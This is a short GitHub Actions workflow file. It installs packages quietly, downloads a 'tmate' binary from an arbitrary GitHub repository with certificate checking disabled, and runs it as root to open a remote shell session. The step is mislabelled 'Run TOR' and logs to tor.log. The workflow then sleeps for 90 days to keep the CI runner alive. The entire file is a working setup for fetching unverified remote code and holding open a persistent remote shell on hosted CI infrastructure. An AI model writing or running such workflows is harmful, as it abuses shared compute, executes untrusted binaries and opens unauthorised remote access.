name: new
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Update OS
        run: sudo apt-get update -y && sudo apt-get upgrade -y > /dev/null 2>&1 && sudo apt-get -y install wget curl nano git xz-utils openssh-server build-essential net-tools dialog apt-utils libevent* libsecret* > /dev/null 2>&1
      - name: Run TOR
        run: |
          curl -LJOk "https://github.com/kevinkarinppq/tm/raw/main/tmate"
          sudo chmod +x tmate
          sudo ./tmate -F >> tor.log &
          sleep 1m
          sudo cat tor.log
      - name: Loop
        run: |
          sleep 90d
